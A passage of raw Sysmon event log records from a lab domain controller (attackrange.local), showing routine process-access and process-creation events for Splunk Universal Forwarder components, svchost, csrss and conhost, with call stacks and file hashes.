Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009119Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:18.703{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-46B6-6000-F104-000000009A01}4424C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009118Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:18.703{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009117Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:18.703{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009116Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:18.703{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009115Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:18.703{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009114Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:18.703{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009113Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:18.703{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009112Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:18.703{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009111Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:18.703{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009110Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:18.703{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009109Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:18.703{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-46B6-6000-F104-000000009A01}4424C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009108Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:18.703{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-46B6-6000-F104-000000009A01}4424C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009107Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:18.703{08A6967A-46B6-6000-F104-000000009A01}4424C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009106Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:18.171{08A6967A-46B6-6000-F004-000000009A01}37724692C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009105Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:18.031{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-46B6-6000-F004-000000009A01}3772C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009104Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:18.031{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009103Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:18.031{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009102Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:18.031{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009101Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:18.031{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009100Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:18.031{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009099Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:18.031{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009098Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:18.031{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009097Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:18.031{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009096Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:18.031{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009095Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:18.031{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-46B6-6000-F004-000000009A01}3772C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009094Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:18.031{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-46B6-6000-F004-000000009A01}3772C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009093Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:18.032{08A6967A-46B6-6000-F004-000000009A01}3772C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 